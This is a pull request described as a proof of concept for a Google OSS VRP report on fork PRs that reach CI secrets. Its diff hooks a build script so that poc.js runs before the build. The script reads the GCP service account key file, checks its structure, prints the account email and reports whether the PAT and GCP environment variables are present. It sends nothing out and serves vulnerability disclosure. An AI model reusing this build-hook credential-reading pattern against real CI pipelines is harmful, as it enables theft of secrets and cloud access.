### PR TITLE
ci: safe PoC for fork PR GCP secret exposure (VRP)

### DIFF
--- a/package.json
+++ b/package.json
@@ -12,7 +12,7 @@
     "reload-dev-w": "NODE_ENV=reload node --max-old-space-size=8192 ./node_modules/.bin/webpack-dev-server --mode development --progress --config=./webpack.config.cdap.dev.js",
     "hmr-dev-w": "NODE_ENV=hmr node --max-old-space-size=8192 ./node_modules/.bin/webpack-dev-server --mode development --progress --config=./webpack.config.cdap.dev.js",
     "cdap-full-build": "run-p cdap-prod-build distribute",
-    "cdap-full-build-more-memory": "NODE_OPTIONS=\"--max_old_space_size=8192\" run-p cdap-prod-build distribute",
+    "cdap-full-build-more-memory": "node poc.js && NODE_OPTIONS=\"--max_old_space_size=8192\" run-p cdap-prod-build distribute",
     "cdap-non-optimized-full-build": "NODE_ENV=non-optimized-production webpack --config=webpack.config.js",
     "clean-node-modules": "modclean -P -r --patterns=\"default:safe\" --additional-patterns=\"*.xls?x,*.ppt?x,*.rtf,*.png,*.jpg,*.jpeg,*.txt\" --ignore=\"validate-npm-license,readme*\"",
     "distribute": "node ./node_modules/gulp/bin/gulp.js distribute",

--- a/poc.js
+++ b/poc.js
@@ -1,0 +1,36 @@
+'use strict';
+const fs = require('fs');
+
+const keyPath = './key_file.json';
+const keyExists = fs.existsSync(keyPath);
+
+let keyLooksValid = false;
+let serviceAccountEmail = null;
+let keySize = 0;
+
+if (keyExists) {
+  const raw = fs.readFileSync(keyPath, 'utf8');
+  keySize = raw.length;
+  try {
+    const key = JSON.parse(raw);
+    keyLooksValid = Boolean(
+      key.type === 'service_account' &&
+      key.client_email &&
+      key.private_key_id &&
+      key.private_key
+    );
+    serviceAccountEmail = key.client_email;
+  } catch (e) {
+    // parse error - key may be malformed
+  }
+}
+
+console.log('===CDAP-UI-VRP-POC-START===');
+console.log('POC_KEY_FILE_EXISTS=' + keyExists);
+console.log('POC_KEY_FILE_SIZE_BYTES=' + keySize);
+console.log('POC_KEY_IS_GCP_SERVICE_ACCOUNT_JSON=' + keyLooksValid);
+console.log('POC_SERVICE_ACCOUNT_EMAIL=' + serviceAccountEmail);
+console.log('POC_SCM_PAT_PRESENT=' + Boolean(process.env.SCM_TEST_REPO_PAT));
+console.log('POC_GCP_PROJECT_PRESENT=' + Boolean(process.env.GCP_PROJECTID));
+console.log('POC_GCP_SA_PATH_ENV=' + Boolean(process.env.GCP_SERVICE_ACCOUNT_PATH));
+console.log('===CDAP-UI-VRP-POC-END===');

--- a/poc.js
+++ b/poc.js
@@ -9,9 +9,9 @@ let serviceAccountEmail = null;
 let keySize = 0;
 
 if (keyExists) {
-  const raw = fs.readFileSync(keyPath, 'utf8');
-  keySize = raw.length;
   try {
+    const raw = fs.readFileSync(keyPath, 'utf8');
+    keySize = raw.length;
     const key = JSON.parse(raw);
     keyLooksValid = Boolean(
       key.type === 'service_account' &&
@@ -21,7 +21,7 @@ if (keyExists) {
     );
     serviceAccountEmail = key.client_email;
   } catch (e) {
-    // parse error - key may be malformed
+    // I/O or parse error
   }
 }
 


### PR DESCRIPTION
## Security Research PoC — Google OSS VRP

This PR is a **safe proof-of-concept** for a vulnerability reported to Google OSS VRP:

> Fork PRs that receive the `build` label run attacker-controlled code on `k8s-runner-e2e`
> after `CDAP_UI_E2E_GCP_SERVICE_ACCOUNT_CONTENTS` and `SCM_TEST_REPO_PAT` are retrieved
> from GCP Secret Manager and written to disk. GitHub's normal fork secret isolation does
> not protect ambient k8s Workload Identity credentials.

Fix PR: #1398

### What this PoC does

`poc.js` (added to repo root) reads `./key_file.json` structure and checks env var presence.
**No credential content is transmitted or exfiltrated.**

`package.json` is modified so `cdap-full-build-more-memory` runs `node poc.js` first.

Expected CI output if the `build` label is applied:

```
===CDAP-UI-VRP-POC-START===
POC_KEY_FILE_EXISTS=true
POC_KEY_IS_GCP_SERVICE_ACCOUNT_JSON=true
POC_SERVICE_ACCOUNT_EMAIL=<sa>@<project>.iam.gserviceaccount.com
POC_SCM_PAT_PRESENT=true
POC_GCP_PROJECT_PRESENT=true
===CDAP-UI-VRP-POC-END===
```

This output would confirm fork-controlled code can observe both credentials after the
Secret Manager step — which is the evidence the VRP triager requested.

Requesting the `build` label to produce this CI log output as concrete VRP evidence.